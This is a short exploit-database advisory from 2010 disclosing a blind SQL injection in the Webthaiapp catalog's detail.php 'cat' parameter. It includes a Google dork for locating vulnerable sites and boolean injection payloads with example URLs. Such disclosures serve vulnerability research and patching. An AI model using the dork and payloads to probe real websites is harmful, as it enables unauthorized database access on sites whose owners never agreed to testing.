id: 12082
date: 04/30/2010
title: Webthaiapp detail.php(cat) Blind Sql injection Vulnerability
author: Xelenonz
cves: 

============================================================
Webthaiapp detail.php(cat) Blind Sql injection Vulnerability
============================================================

--==+==================================================+==--
 
--==+             Webthaiapp detail.php(cat) Blind Sql injection
Vulnerability                +==--
 
--==+==================================================+==--
 
Date : 30-04-2010
 
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
AUTHOR: Xelenonz
 
Homepage : www.thaishadow.com
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
 
Application : Webthaiapp
 
Vendor      : http://www.Webthaiapp.com/
 
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
DORK (google): "inurl:catalog/product/detail.php?cat="
 
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
DESCRIPTION:
 
EXPLOITS:
 
detail.php?cat=[valid catid]+and+1=1   << TRUE
 
detail.php?cat=[valid catid]+and+1=2  << False
 
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
Example
 
http://server/catalog/product/detail.php?cat=44+and+1=1 
<< True
 
http://server/catalog/product/detail.php?cat=44+and+1=2
<< False
 
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2023-03-25]  #